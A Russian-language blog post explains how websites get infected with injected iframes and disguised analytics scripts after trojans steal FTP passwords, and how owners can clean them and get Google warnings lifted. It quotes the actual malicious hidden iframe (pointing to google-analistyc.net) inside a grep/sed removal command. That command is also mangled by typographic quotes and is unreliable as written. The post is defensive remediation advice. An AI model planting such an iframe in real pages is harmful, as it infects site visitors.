Заражённые сайты — новый бич Рунета

Стоит отметить, сразу, что это бич не только Рунета, но и всей Сети. Но за последние пару месяцев я наблюдаю просто дикий рост количества подобных сайтов именно в Рунете.

За последние пару месяцев ко мне обратилось более десятка людей, у которых появились проблемы такого рода на их сайтах. Всем помог, все довольны, но у людей это сожрало деньги, время, нервы и позиции в поисковых системах.

Заражённые сайты - новый бич Рунета

Что такое «вирусы на сайте»? Как правило, это банальный фрейм, который либо накручивает показы какой-нибудь порно-странички,или, что чаще, пытается подгрузить через дыры в браузерах копию трояна для вашей операционной системы.

В основном, это вирусы семейства Downloader.JS.*.

Трояны же могут выполнять самые разнообразные функции, от воровства различных электронных кошельков и средств на них, до воровства паролей к ftp и ssh от хостингов, для заражения новых сайтов.

Пароли, как бы они хорошо не шифровались, можно вытащить практически из любой программы, к примеру из Far Commander или Mozilla Firefox вытащить их проще некуда. И список таких программ достаточно обширен, по факту — все популярные браузеры и ftp-клиенты.

Вытащенные пароли от ftp троян отправляет на сервер-матку, которая их определённым образом обрабатывает, и ставит в очередь на заражение. Звучит немного бредово, но на самом деле это до смешного просто реализовать. Единственная сложность, которую я вижу прямо сейчас — это обеспечить большую скорость работы вредоносного скрипта.

Эти самые скрипты, логинясь на фтп, проходятся по всем каталогам рекурсивно, внедряя свой код в определённые файлы. Как правило их можно назвать двумя масками: index.* и *.js. Обычно эти скрипты внедряют код разными способами, к примеру обычный фрейм, или вызов удалённого JS, который рисует тот-же самый фрейм. Способов достаточно много.

Заражённые сайты - новый бич Рунета
(кликабельно)

Часто зловредный код маскируется под популярные сервисы, к примеру под Аналитику от Google или счётчик от LiveInternet.

Если с прямой угрозой заражения компьютера мы, как грамотные пользователи, справится можем, то с угрозой самим сайтам справится сложнее.

Во-первых, с момента заражения ваш сайт, а то и сайты — это разносчик заразы, и если ваша аудитория девушки-школьницы — то есть большой шанс того, что заражённых машин будет довольно много.

Во-вторых, все современные браузеры блокирует заражённые сайты, основываясь на статистике от специализированных поисковых роботов Google. Выглядит это как на картинке сверху. Естественно, что к вашему Е-магазину, сайту-визитке или просто к блогу — отношение будет резко негативное. Клиента или читателя так потерять недолго.

В-третьих, если заражённый сайт достаточно долго висит без устранения зловредного кода, он начинает скатываться с позиций в поисковых системах. Точно скатывается в Яндексе и в Google. По поводу остальных — я не уверен. Плюс, в выдачи Google напротив заражённого сайта стоит пометка, мол опасен сайт, остерегайтесь.

Так же часто падение идёт и по вину владельца сайта, так как многие перекрывают через htaccess индексный файл какой-нибудь страничкой, с лаконичным «Технические работы». Но в данном случае, лучше временно потерять позиции, чем позволить сайту и дальше заражать людей, в то время, пока вы исправляете последствия заражения.

Кстати, вот что говорит Google на предмет страницы google-analistyc.net:

Заражённые сайты - новый бич Рунета
(кликабельно)

В итоге, от заразы можно избавится, по сути, двумя способами. К примеру, если ваши сайты включают в себя зловредный код, который ведёт на google-analistyc.net, то вам поможет вот такой код:

grep -R google-analistyc.net . | awk ‘{print $1}’ | cut -d «:» -f 1 | xargs -n1 sed -i » ‘s|<\!— ~ —><iframe src=\»http:\/\/google-analistyc.net\/in.cgi?12\» width=\»0\» height=\»0\» style=\»display:none\»><\/iframe><\!— ~ —>||g’

Соответственно, если вы обнаружили, что видов зловредного кода два-три — то вот таким нехитрым способом можно вычистить достаточно быстро.

Второй способ — это руками. Иногда мне приходилось править файлы руками, потому что весь зловредный код был абсолютно разным, и я не смог написать под него регулярное выражение.

После того, как вы удалите весь зловредный код, внимательно следите за тем, что подгружается на страницу, к примеру с помощью firebug для firefox. Возможно, вы что-то пропустили.

Ну а про смену паролей на ftp, я и вовсе, промолчу — думаю вы сами дагадались, что его-то менять надо в первую очередь.

Для того, что бы избавится от красного ярма на сайте (см. первую картинку), необходимо будет провернуть пару незамысловатых мероприятий и подождать примерно около недели. Хотя русская поддержка Google бьёт себя пяткой в грудь и настаивает, что меньше месяца ну никак не выйдет. Выходит, и только в путь.

Всё просто, вам необходимо зайти в панель Вебмастера Google (а если её нет, то зарегистрироваться и провалидировать сайт), и отправить заявку на рассмотрение. Рассматривает разумеется роботами, потому почистить надо хорошо. Если при рассмотрении, о котором вы сами и попросили, ваш сайт снова будет признан опасным, время его «обеления» резко увеличивается.

Получилось много, и немного сумбурно, если будут конкретные вопросы, а не сумбурные, как например «Как удалить вирус с сайта» (за ответы на такие вопросы я беру денег), то смело задавайте их в комментариях. Постараюсь помочь.

Поделиться с друзьями в: ВКонтакте, Facebook, Twitter
Другие записи из этой категории:
Оставьте комментарий: